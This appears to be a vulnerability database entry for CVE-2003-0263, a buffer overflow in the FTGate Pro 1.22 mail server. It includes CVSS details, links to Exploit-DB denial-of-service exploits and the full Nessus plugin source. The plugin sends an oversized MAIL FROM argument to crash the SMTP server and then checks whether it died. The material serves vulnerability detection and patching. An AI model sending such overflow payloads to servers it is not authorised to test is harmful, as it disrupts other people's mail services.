Vulnerabilities > CVE-2003-0263 - Buffer Overflow vulnerability in Floosietek Ftgatepro 1.221328

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
floosietek
nessus
exploit available
NVD
Published: 2003-05-27
Updated: 2017-07-11

Summary

Multiple buffer overflows in Floosietek FTGate Pro Mail Server (FTGatePro) 1.22 allow remote attackers to execute arbitrary code via long (1) MAIL FROM or (2) RCPT TO commands.

Vulnerable Configurations

Part Description Count
Application
Floosietek
1

Exploit-Db

  • descriptionFloosietek FTGate PRO 1.22 SMTP RCPT TO Buffer Overflow Vulnerability. CVE-2003-0263. Dos exploit for windows platform
    idEDB-ID:22569
    last seen2016-02-02
    modified2003-05-06
    published2003-05-06
    reporterDennis Rand
    sourcehttps://www.exploit-db.com/download/22569/
    titleFloosietek FTGate PRO 1.22 SMTP RCPT TO Buffer Overflow Vulnerability
  • descriptionFloosietek FTGate PRO 1.22 SMTP MAIL FROM Buffer Overflow Vulnerability. CVE-2003-0263. Dos exploit for windows platform
    idEDB-ID:22568
    last seen2016-02-02
    modified2003-05-06
    published2003-05-06
    reporterDennis Rand
    sourcehttps://www.exploit-db.com/download/22568/
    titleFloosietek FTGate PRO 1.22 SMTP MAIL FROM Buffer Overflow Vulnerability

Nessus

NASL familySMTP problems
NASL idFTGATE_PRO_DOS.NASL
descriptionThe remote SMTP server is running FT Gate Pro. There is a remote stack-based buffer overflow vulnerability in this version. This issue can be exploited by supplying a very long argument to the
last seen2020-06-01
modified2020-06-02
plugin id11579
published2003-05-06
reporterThis script is Copyright (C) 2003-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11579
titleFTGatePro Mail Server Multiple Command Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#

# Ref:
# From: "Dennis Rand" <[email protected]>
# To: "Vulnwatch@Vulnwatch. Org" <[email protected]>,
# Date: Tue, 6 May 2003 14:57:25 +0200
# Subject: [VulnWatch] Multiple Buffer Overflow Vulnerabilities Found in FTGate Pro Mail Server v. 1.22 (1328)


include("compat.inc");

if (description)
{
 script_id(11579);
 script_version("1.20");
 script_cvs_date("Date: 2018/11/15 20:50:24");

 script_cve_id("CVE-2003-0263");
 script_bugtraq_id(7506, 7508);

 script_name(english:"FTGatePro Mail Server Multiple Command Remote Overflow");
 script_summary(english:"Checks for FTgate");

 script_set_attribute(attribute:"synopsis", value:
"The remote service is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"The remote SMTP server is running FT Gate Pro.

There is a remote stack-based buffer overflow vulnerability in this
version.  This issue can be exploited by supplying a very long
argument to the 'MAIL FROM' and 'RCPT TO' SMTP commands.

A remote attacker could use this to crash the SMTP server, or
possibly execute arbitrary code.");
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/vulnwatch/2003/q2/54"
 );
 script_set_attribute(attribute:"solution", value:
"Upgrade to FTgate Pro Mail Server v. 1.22 Hotfix 1330 or later.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value:"2003/05/06");
 script_set_attribute(attribute:"vuln_publication_date", value:"2003/05/06");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_copyright(english:"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.");
 script_family(english:"SMTP problems");

 script_dependencie("smtpserver_detect.nasl");
 script_require_ports("Services/smtp", 25);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("smtp_func.inc");
include("misc_func.inc");

if (report_paranoia < 1) exit(0, "This script is prone to false positive.");

port = get_service(svc:"smtp", default: 25, exit_on_fail: 1);
banner = get_smtp_banner(port:port);
if (! banner || "FTGatePro" >!< banner)
 exit(0, "The remote SMTP server is not FTGatePro");

soc = open_sock_tcp(port);
if (!soc) exit(1, "Cannot connect to TCP port "+port+".");

   r = smtp_recv_banner(socket:soc);

   send(socket:soc, data:string("HELO there\r\n"));
   r = recv_line(socket:soc, length:4096);

   send(socket:soc, data:string("MAIL FROM: ", crap(2400), "@", crap(2400),".com\r\n\r\n"));
   r = recv_line(socket:soc, length:4096, timeout:1);
   close(soc);

soc = open_sock_tcp(port);
if (! soc)
{
  if (service_is_dead(port: port) <= 0)	# alive or timeout
    exit(1, "Could not reconnect to port "+port+".");
  security_warning(port:port, extra:string("\nThe remote MTA died.\n"));
  exit(0);
}

   r = smtp_recv_banner(socket:soc);
if( ! r)
 security_warning(port:port, extra:string("\nThe remote MTA does not display its banner anymore.\n"));

   close(soc);

References